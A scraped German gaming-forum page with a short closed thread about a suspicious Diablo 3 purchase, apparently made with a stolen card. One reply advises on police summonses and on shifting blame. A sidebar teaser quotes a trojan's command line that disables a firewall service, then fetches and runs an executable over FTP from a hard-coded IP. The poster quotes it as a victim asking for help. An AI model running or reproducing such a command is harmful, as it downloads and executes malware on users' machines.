Register for your free account! | Forgot your password?

Go Back   elitepvpers > General Gaming > General Gaming Discussion
You last visited: Today at 09:24

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Merkwürdiger Diablo 3 Kauf

Discussion on Merkwürdiger Diablo 3 Kauf within the General Gaming Discussion forum part of the General Gaming category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: May 2012
Posts: 1
Received Thanks: 0
Merkwürdiger Diablo 3 Kauf

Angerufen, geregelt. Nur hoffen dass ich mein Geld bei Paypal wieder kriege.
Scarion1994 is offline  
Old 05/20/2012, 19:29   #2
 
elite*gold: 0
Join Date: May 2012
Posts: 5
Received Thanks: 0
War wegen einer ähnlichensache schon mal bei der polizei vorgeladen! kannst hoffen das er das öfter mach und das die kreditkarte bekannt ist als gebrauchte sozusagen. am besten noch alles merken von ihm woher du den kennst namen usw falls du bei der polizei vorgeladen wirst und die schuld von dir weg schieben willst. in der regel passiert dabei aber nichts wenn es dein erstes dilikt ist aber ätzend ist es schoN! PN mich bei weiteren fragen war wegen genau der selben sache allerdings bei WOW schon mal bei der polizei
peterpan91 is offline  
Old 05/20/2012, 22:00   #3
Trade Restricted
 
hi im andi's Avatar
 
elite*gold: 329
The Black Market: 181/1/1
Join Date: Nov 2009
Posts: 11,098
Received Thanks: 3,417
#Closed
hi im andi is offline  
Closed Thread


Similar Threads Similar Threads
[WARNUNG] Beim Kauf von Diablo 3 Accout´s/Key´s!
05/31/2012 - Diablo 3 Trading - 35 Replies
Hallo zusammen, einige von euch wollen ja anscheinend unbedingt Diablo 3 haben und das billiger als im Laden! Es werden hier auch viele accounts/Key´s angeboten. Jedoch sind gut 90% Davon "Gefakte" Accounts/keys. Bei dem keys gibt es in der Regel kein banngefahr, sofern diese keys nicht von Partnerseiten von Blizzard gekauft wurden. Wie erkennt man denn solche Gefakten Accounts/Keys?: Keys: Bei den Keys ist es etwas schwieriger zu wissen, ob sie nun gefakt sind oder nicht. Lasst...
Frage zum Kauf von Diablo 3 MMOGA
05/16/2012 - Diablo 3 - 8 Replies
Huhu, ich habe ne Frage und zwar wollte ich mir jetzt nur den Key bei mmog a kaufen, und wollte wissen wie ich dann den key bekomme und ob ich den dann bei blizzard auf der homepage aktivieren kann, wäre nett wenn mir einer seine Erfahrungen mit mmo ga schildern könnte.
Merkwürdiger Fehler
08/08/2009 - Metin2 Private Server - 2 Replies
Hallo ich habe ein Problem ich kann mir keinen zuiaipk acc erstellen es kommt immer ein Fehler. Kann mir Bitte Jemand einen ertstellen Danke .
merkwürdiger trojaner
01/01/2008 - Technical Support - 2 Replies
hm. hab nen merkwürdigen trojaner aufm comp. macht taskmanager auf will cmd starten und das schreiben: cm/c net stopSharedAccess &echo open 87.123.239.115 44752 >> ij &echo user d3m0n3 d4rk3v1l >> ij &echo get iq.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &iq.exe &net start SharedAccess &exit hat jemand ne idee was er machen will. und wer is dieser demone darkevil? btw soll ich gleich noch hihjackthis posten?



All times are GMT +2. The time now is 09:24.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.